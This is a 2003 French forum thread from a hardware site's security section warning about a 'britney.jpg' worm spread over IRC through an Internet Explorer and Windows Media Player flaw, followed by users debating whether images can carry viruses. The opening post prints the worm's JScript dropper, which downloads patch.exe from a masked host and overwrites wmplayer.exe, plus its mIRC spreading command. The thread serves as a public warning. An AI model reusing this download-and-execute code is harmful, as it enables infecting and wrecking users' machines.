Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
1933 connectés 

  FORUM HardWare.fr
  Windows & Software
  Sécurité

  nouveau virus "britney" ... attention !!!

 


 Mot :   Pseudo :  
 
 Page :   1  2  3  4
Page Précédente
Auteur Sujet :

nouveau virus "britney" ... attention !!!

n°1327225
mrpochpoch
Posté le 27-10-2003 à 14:04:38  profilanswer
 

http://www.presence-pc.com/news/n1972.html
 
D'après cette news, faites attention à ce nouveau virus, qui n'est pas encore détecté par les anti-virus, et qui se propage par IRC via une nouvelle faille d'IE ...
 
 

Depuis hier, un nouveau vers très dangereux circule sur Internet: il se diffuse via le réseau IRC et se cache derrière une image au format JPEG nommée "britney.jpg" hébergée sur les serveurs de Angelfire et scavenger.sharewith.us.  
 
Ce vers exploite une faille de sécurité présente dans le navigateur Microsoft Internet Explorer ainsi que dans le lecteur Windows Media Player (documentée ici). Lorsque qu'un lien contenant le fichier "britney.jpg" est ouvert, ce petit bout de code se charge de télécharger un fichier .exe responsable du désordre qui règnera alors sur votre ordinateur:  
-----  
var x = new ActiveXObject("Microsoft.XMLHTTP" );  
x.Open("GET", "http://***********.us/patch.exe",0);  
x.Send();  
var s = new ActiveXObject("ADODB.Stream" );  
s.Mode = 3;  
s.Type = 1;  
s.Open();  
s.Write(x.responseBody);  
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);  
location.href = "mms://";  
-----  
 
Le programme patch.exe est compressé avec l'utilitaire de compression d'exécutables nommé UPX. Lorsque l'on analyse son contenu après décompression, on peut trouver la commande:  
/.amsg http://www.angelfire.com/*****/*****/britney.jpg <- uuh, check it out !!  
 
Si le logiciel mIRC est lancé, alors un message contenant l'url infectée sera envoyé sur tous les salons de discussion sur lesquels vous êtes présent.  
 
Ce fichier exécutable contient également une listes de fichiers systèmes tels ntoskrnl.exe, userinit.exe, services.exe, ainsi qu'une liste de fichiers exécutables correspondant à divers logiciels anti-virus et firewalls. Cette liste permet au vers de désactiver les logiciels de protection en question pour ensuite pouvoir remplacer/effacer les fichiers systèmes Windows et altérer le contenu de la base de registre. Si le service de protection des fichiers systèmes est activé, Windows détectera toutes ces modifications et vous proposera de redémarrer votre machine pour qu'il puisse procéder à une restauration des fichiers concernés.  
 
Passé ce stade, vous pouvez considérer votre Windows comme perdu à tout jamais: tenter de réparer l'installation de Windows ou de restaurer les fichiers endommagés ne sera pas suffisant pour récupérer le système. Comme le vers aura altéré la base de registres, une réinstallation complète sera nécessaire.  
 
Pour le moment, le virus ne s'attaquerait pas à Windows 98 mais il s'attaque de manière certaine au moins à Windows 2000 et Windows XP. Les logiciels anti-virus dans leur version actuelle ne vous seront d'aucune utilité puisque le virus n'est pas encore connu: surtout ne pas confondre ce nouveau vers avec le vers mIRC nommé "britny" dont vous pourrez trouver la description ici  
 
Le site scavenger.sharewith.us auraît déjà pris les mesures nécessaires pour empêcher la diffusion du virus, mais la page du site Angelfire est encore active. En conséquence, ne cliquez pas sur un lien du type http://www.angelfire.com/***/***.jpg.

 
 
 :hello:
 
Edit : J'ai viré les liens figurant dans ce post ...


Message édité par mrpochpoch le 28-10-2003 à 08:05:14
mood
Publicité
Posté le 27-10-2003 à 14:04:38  profilanswer
 

n°1327228
morganno
oui oui, toi aussi.
Posté le 27-10-2003 à 14:08:23  profilanswer
 

une image NE PEUT PAS contenir de virus... Elle peut seulement activer un virus déjà installer.... Il faut arreter les légendes urbaine Mrpochpoch....

n°1327234
mrpochpoch
Posté le 27-10-2003 à 14:13:53  profilanswer
 

morganno a écrit :

une image NE PEUT PAS contenir de virus... Elle peut seulement activer un virus déjà installer.... Il faut arreter les légendes urbaine Mrpochpoch....


 
ce n'est pas moi qui le dit ... c'est d'ailleurs la raison pour laquelle j'ai mis le texte en italique ...
 
Ce n'est pas l'image qui est verollée, mais le fait de cliquer sur le lien contenant le nom de cette image permet apparemment à un bout de code de s'éxécuter et d'infecter le PC ...
 
Maintenant, je ne suis pas spécialiste en virus et anti-virus ... je poste juste ici pour donner cette information trouvée ailleurs, sur un site qui me semble etre sérieux dans ses infos ...
 
Et si cette info ne te semble pas intéressante, passe ton chemin ...  :kaola:  
 
 :jap:


Message édité par mrpochpoch le 27-10-2003 à 14:19:13
n°1327240
freds45
Posté le 27-10-2003 à 14:21:54  profilanswer
 

morganno a écrit :

une image NE PEUT PAS contenir de virus... Elle peut seulement activer un virus déjà installer.... Il faut arreter les légendes urbaine Mrpochpoch....


 
 :non:  
déjà vu passer qquechose comme ca pourtant...;) un .jpg qui contenait avant l'image du code vbscript. Il faisait ouvrir le lecteur cd du pc [:ddr555] !


---------------
Filmstory : gardez trace des films que vous avez vu ! :D
n°1327241
brainbugs
Posté le 27-10-2003 à 14:22:16  profilanswer
 

/.amsg http://www.angelfire.com/celeb2/picsx/britney.jpg <- uuh, check it out !!  
 
marche pas l'url.

n°1327244
antp
Super Administrateur
Champion des excuses bidons
Posté le 27-10-2003 à 14:23:45  profilanswer
 

freds45 a écrit :


 
 :non:  
déjà vu passer qquechose comme ca pourtant...;) un .jpg qui contenait avant l'image du code vbscript. Il faisait ouvrir le lecteur cd du pc [:ddr555] !


 
C'était pas une image.
Juste un script avec extension .jpg, mais ça n'en fait pas une image :D
Et comme sur le web l'action dépend du "content-type" envoyé par le serveur et non de l'extension, si on dit au browser que c'est un script il l'exécute.
Et dans ce cas-ci le script exploite une faille de sécu de IE (et uniquement IE :D)

n°1327262
freds45
Posté le 27-10-2003 à 14:38:15  profilanswer
 

antp a écrit :


 
C'était pas une image.
Juste un script avec extension .jpg, mais ça n'en fait pas une image :D
Et comme sur le web l'action dépend du "content-type" envoyé par le serveur et non de l'extension, si on dit au browser que c'est un script il l'exécute.
Et dans ce cas-ci le script exploite une faille de sécu de IE (et uniquement IE :D)


 
si justement, yavait le script, et une image ;)


---------------
Filmstory : gardez trace des films que vous avez vu ! :D
n°1327267
antp
Super Administrateur
Champion des excuses bidons
Posté le 27-10-2003 à 14:39:35  profilanswer
 

non:
il y avait une page web contenant un script et un lien <img src="..."> qui lui affichait une image.
Donc l'url ne pointait pas directement vers une image :p

n°1327271
freds45
Posté le 27-10-2003 à 14:41:44  profilanswer
 

on est ptêt tombés sur 2 images différentes :p
 
mais je t'assure qu'il y avait le script et l'image dans le même fichier ! ;)


---------------
Filmstory : gardez trace des films que vous avez vu ! :D
n°1327274
antp
Super Administrateur
Champion des excuses bidons
Posté le 27-10-2003 à 14:42:27  profilanswer
 

:non: pas possible
Tu voyais quoi en faisant view source sur l'image ? Du code HTML+VBS, non ?


Message édité par antp le 27-10-2003 à 14:42:56
mood
Publicité
Posté le 27-10-2003 à 14:42:27  profilanswer
 

n°1327277
freds45
Posté le 27-10-2003 à 14:44:17  profilanswer
 

Je t'assure que si pourtant. Enfin crois-moi pas, tant pis pour toi [:spamafote]
 
edit: j'ai pas le fichier en question sous la main, je pourrai poster le lien ce soir, il est sur mon pc chez moi :)
 
edit2: j'ai comme un gros doute tout à coup, sur le html+vbs [:totoz]


Message édité par freds45 le 27-10-2003 à 14:46:59

---------------
Filmstory : gardez trace des films que vous avez vu ! :D
n°1327289
antp
Super Administrateur
Champion des excuses bidons
Posté le 27-10-2003 à 14:49:35  profilanswer
 

freds45 a écrit :


edit: j'ai pas le fichier en question sous la main, je pourrai poster le lien ce soir, il est sur mon pc chez moi :)


 
bah oui, poste-le, parce que je serais curieux... à moins qu'en plus de la faille bien connue avec le VBS IE ait une faille avec les images, je ne vois pas comment ça pourrait marcher :??:

n°1327298
mrpochpoch
Posté le 27-10-2003 à 14:55:16  profilanswer
 

brainbugs a écrit :

/.amsg http://www.angelfire.com/celeb2/picsx/britney.jpg <- uuh, check it out !!  
 
marche pas l'url.
 


 
apparemment, c'est normal, et tant mieux !! l'hébergeur a du faire quelque chose pour empecher l'accès à ce type de contenu ...
 
Enfin, bon ... ça commence à faire bien chier toutes ces failles de sécu sur IE ... et sur Media-player aussi maintenant !!!  :heink:  
 
vive opera !  :D

n°1327300
F18
Posté le 27-10-2003 à 14:56:07  profilanswer
 

morganno a écrit :

une image NE PEUT PAS contenir de virus... Elle peut seulement activer un virus déjà installer.... Il faut arreter les légendes urbaine Mrpochpoch....


 
exacte vue que t'aime l'humour debile en voici.
 
http://www.lemonde.fr/web/recherch [...] 358,0.html [:criun]  
 
comme tu l'aimes.

n°1327301
antp
Super Administrateur
Champion des excuses bidons
Posté le 27-10-2003 à 14:57:00  profilanswer
 

je vois pas le rapport

n°1327303
BaCkFiRe
I ● Tokyo
Posté le 27-10-2003 à 14:57:53  profilanswer
 

Mrpochpoch a écrit :


 
apparemment, c'est normal, et tant mieux !! l'hébergeur a du faire quelque chose pour empecher l'accès à ce type de contenu ...
 
Enfin, bon ... ça commence à faire bien chier toutes ces failles de sécu sur IE ... et sur Media-player aussi maintenant !!!  :heink:  
 
vive opera !  :D  


spas nouveau les failles sur le Media Player de windows :o


---------------
"I'm as mad as hell and I'm not going to take this anymore !"
n°1327305
freds45
Posté le 27-10-2003 à 15:00:19  profilanswer
 

antp a écrit :

je vois pas le rapport


 
bah c'est F18 [:spamafote] ...


---------------
Filmstory : gardez trace des films que vous avez vu ! :D
n°1327306
F18
Posté le 27-10-2003 à 15:00:22  profilanswer
 

antp a écrit :

je vois pas le rapport


 
ce matin j'ai recu 4 fichiers probablement infecté que norton n'a pas pu identifier car c'etait 3 en EXE et 1 en PIF j'ai detruit sans ouvrir.
 
tous les emails provenais de boites emails allemandes car l'extension est De hors l'identitie d'un pays finissant par DE sont pas la France.


Message édité par F18 le 27-10-2003 à 15:03:18
n°1327354
antp
Super Administrateur
Champion des excuses bidons
Posté le 27-10-2003 à 15:38:18  profilanswer
 

Formidable... je ne vois toujours pas ce que ça vient faire dans l'histoire :D

n°1327356
morganno
oui oui, toi aussi.
Posté le 27-10-2003 à 15:39:22  profilanswer
 

moi ce matin j'ai recu un email de tawain ! vous vous rendez compte? ;-)

n°1327401
pgriffet
Posté le 27-10-2003 à 16:07:47  profilanswer
 

Même chose ici, ce n'est pas une image, en fait.
 
http://www.danasoft.com/sig-fre.jpg
 
http://www.danasoft.com/sig-fre.jpg
 
explications ici :
 
http://forum.pcastuces.com/sujet.asp?SUJET_ID=29171


Message édité par pgriffet le 27-10-2003 à 16:08:15
n°1327406
antp
Super Administrateur
Champion des excuses bidons
Posté le 27-10-2003 à 16:10:32  profilanswer
 

Heu si, ici c'est une image justement.
Le serveur exécute un script qui renvoie une image "personnalisée" (sur le serveur il s'agit bien d'un script) : le client il n'a qu'une image et elle n'a rien de différent par rapport à n'importe quelle autre image techniquement (alors que pour le virus le client reçoit un script).


Message édité par antp le 27-10-2003 à 16:11:32
n°1327409
F18
Posté le 27-10-2003 à 16:12:02  profilanswer
 

antp a écrit :

Formidable... je ne vois toujours pas ce que ça vient faire dans l'histoire :D


 
justement si :
 
il signale que qu'un nouveau virus passe par irc et lors que les societés d'antivirus vont les testes ils constatent que les virus passent aussi bien par IRC que par email.
 

n°1327413
THE REAL K​RYSTOPHE
ストリートファイターBrasileiro NTSC-J
Posté le 27-10-2003 à 16:13:12  profilanswer
 

j ai peur  :(


---------------
AC : SW-5993-1459-0978 / dani / THE REAL KRYSTOPHE (Miss) / Pinacolada   Hémisphère sud
n°1327419
antp
Super Administrateur
Champion des excuses bidons
Posté le 27-10-2003 à 16:15:10  profilanswer
 

F18 a écrit :


 
justement si :
 
il signale que qu'un nouveau virus passe par irc et lors que les societés d'antivirus vont les testes ils constatent que les virus passent aussi bien par IRC que par email.
 
 


 
Et qui dit que c'est le même virus ? Et pourquoi tu racontes cette histoire de .DE dont on se fout ? :D

n°1327429
F18
Posté le 27-10-2003 à 16:21:43  profilanswer
 

antp a écrit :


 
Et qui dit que c'est le même virus ? Et pourquoi tu racontes cette histoire de .DE dont on se fout ? :D


 
 
t'as de la chance que j'ai pas ton email sinon je te l'aurais envoyé comme preuve. :D  
 
le fichier joint fait 35KO
 

n°1327451
antp
Super Administrateur
Champion des excuses bidons
Posté le 27-10-2003 à 16:32:12  profilanswer
 

F18 a écrit :


 sinon je te l'aurais envoyé comme preuve. :D  


 
Pour prouver quoi ? Que c'est le même virus que celui dont il est question dans le topic ? Si tu l'as viré sans regarder comment tu peux savoir que c'est ça ? :??:

n°1327512
fl0ups
東京 - パリ - SLP
Posté le 27-10-2003 à 17:08:12  profilanswer
 

bien flippant le lien du monde
 
Chuis bien content d'etre un nerd linuxien ca devrait me permettre d'eviter ce genre de choses [:joce]

n°1327746
F18
Posté le 27-10-2003 à 20:20:15  profilanswer
 

antp a écrit :

je vois pas le rapport


 
voici le virus que j'ai du recevoir car je reconnais le nom de la piece jointe.
 
http://www.secuser.com/alertes/2003/sober.htm
 
cm-recover.com
 
il figure dans la liste des noms de pieces jointes.

n°1327843
Stourtar
Posté le 27-10-2003 à 22:26:21  profilanswer
 

Bon, ben je crois bien avoir chopper ce virus vu que mon media player a plein de parasites et mon curseur aussi...
 
J'avais le patch.exe dans mon gestionnaires de tache et services.exe, comme c'est écrit dans l'article
 
Tout ça smellt le virus et pourtant, j'ai pas vu ce britney.jpg !!!
 
En tout cas, j'ai plus qu'à formater moi:(

n°1327847
-CouiLLe2C​hieN-
Posté le 27-10-2003 à 22:28:45  profilanswer
 

morganno a écrit :

une image NE PEUT PAS contenir de virus... Elle peut seulement activer un virus déjà installer.... Il faut arreter les légendes urbaine Mrpochpoch....


 
 
y en as qui croit encore au pere noel

n°1327849
-CouiLLe2C​hieN-
Posté le 27-10-2003 à 22:30:07  profilanswer
 

crée une page html appelle la .jpg ouvre la sous mozilla et tu verra le code ouvre la sous IE et tu verra une page HTML ...

n°1327859
antp
Super Administrateur
Champion des excuses bidons
Posté le 27-10-2003 à 22:36:34  profilanswer
 

-CouiLLe2CHieN- a écrit :


 
 
y en as qui croit encore au pere noel  


 
Il a raison, une image ne peut pas contenir de virus... par contre comme je l'ai dit sur le web l'extension ne définit pas le contenu ni le traitement à effectuer.
Bon ici c'est un bug d'IE : Que ce fichier s'appelle .vbs ou .jpg ça revient au même : IE voit qu'il y a un script dedans du coup il l'exécute, alors que ça devrait dépendre des infos qu'envoie le serveur. Il n'y a que IE qui fait des conneries de ce genre :D


Message édité par antp le 27-10-2003 à 22:37:21

---------------
mes programmes ·· les voitures dans les films ·· apprenez à écrire
n°1327860
-CouiLLe2C​hieN-
Posté le 27-10-2003 à 22:37:39  profilanswer
 

oui mais dans son resonnement il dit qu'un vraie jpeg peu executer un autre script qui est deja sur le PC ...

n°1327862
antp
Super Administrateur
Champion des excuses bidons
Posté le 27-10-2003 à 22:38:44  profilanswer
 

S'il y a déjà un virus dans le PC il peut très bien réagir au moment où l'image est lue, je suppose que c'est ça qu'il voulait dire :??:


---------------
mes programmes ·· les voitures dans les films ·· apprenez à écrire
n°1327865
-CouiLLe2C​hieN-
Posté le 27-10-2003 à 22:41:08  profilanswer
 

au moment ou limage est lu ? je comprend pas soit c'est le virus qui dit if open briney.jpg exec gngngngn.vbs mais dans tout les cas c'est n est pas l image qui peu dire when open exec c:/gngngn.vbs ??? je me trompe ?

n°1327869
El Pollo D​iablo
REACHED THE END OF CAKE
Posté le 27-10-2003 à 22:44:11  profilanswer
 

Y'a bien eu un virus (linux pour une fois ;) ) qui utilisait un mp3 volontairement mal formé qui lu avec un lecteur en particulier permettait de lancer une commande shell deletant le contenu du repertoire home de l'user : http://securityresponse.symantec.c [...] bellz.html

n°1327883
XaTriX
Posté le 27-10-2003 à 22:50:32  profilanswer
 

Infected [:ddr555]

n°1327900
THE REAL K​RYSTOPHE
ストリートファイターBrasileiro NTSC-J
Posté le 27-10-2003 à 23:03:18  profilanswer
 

je sais pas si ca a un raport mais avp ma troové ca la :(
 
trojan.win32.fakesvc.c  ds windows/system32/winsta.dll


---------------
AC : SW-5993-1459-0978 / dani / THE REAL KRYSTOPHE (Miss) / Pinacolada   Hémisphère sud
n°1327902
XaTriX
Posté le 27-10-2003 à 23:04:54  profilanswer
 

Alors dans l'ordre ca aniker
 
Ntoskrnl.exe  
System
System.sav
 
et plein d'autre jimagine :/
 
xaT

mood
Publicité
Posté le   profilanswer
 

 Page :   1  2  3  4
Page Précédente

Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Windows & Software
  Sécurité

  nouveau virus "britney" ... attention !!!

 

Sujets relatifs
Help comment supprimer ce virusclavier qui répond bizarrement et souris qui bouge toute seule, virus?
pb suite virusVirus/Ver bizarre : Wincrt32.exe
virus indetecte ?un petit virus pas mechant pour tester mon reseau ...
AD: nouveau ordi placé automatiquement dans une autre OU[Résolu] Virus ? (Nan...)
VIRUS SCHVOST.EXEWanadoo et email erreur 550 c'est nouveau ??
Plus de sujets relatifs à : nouveau virus "britney" ... attention !!!


Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR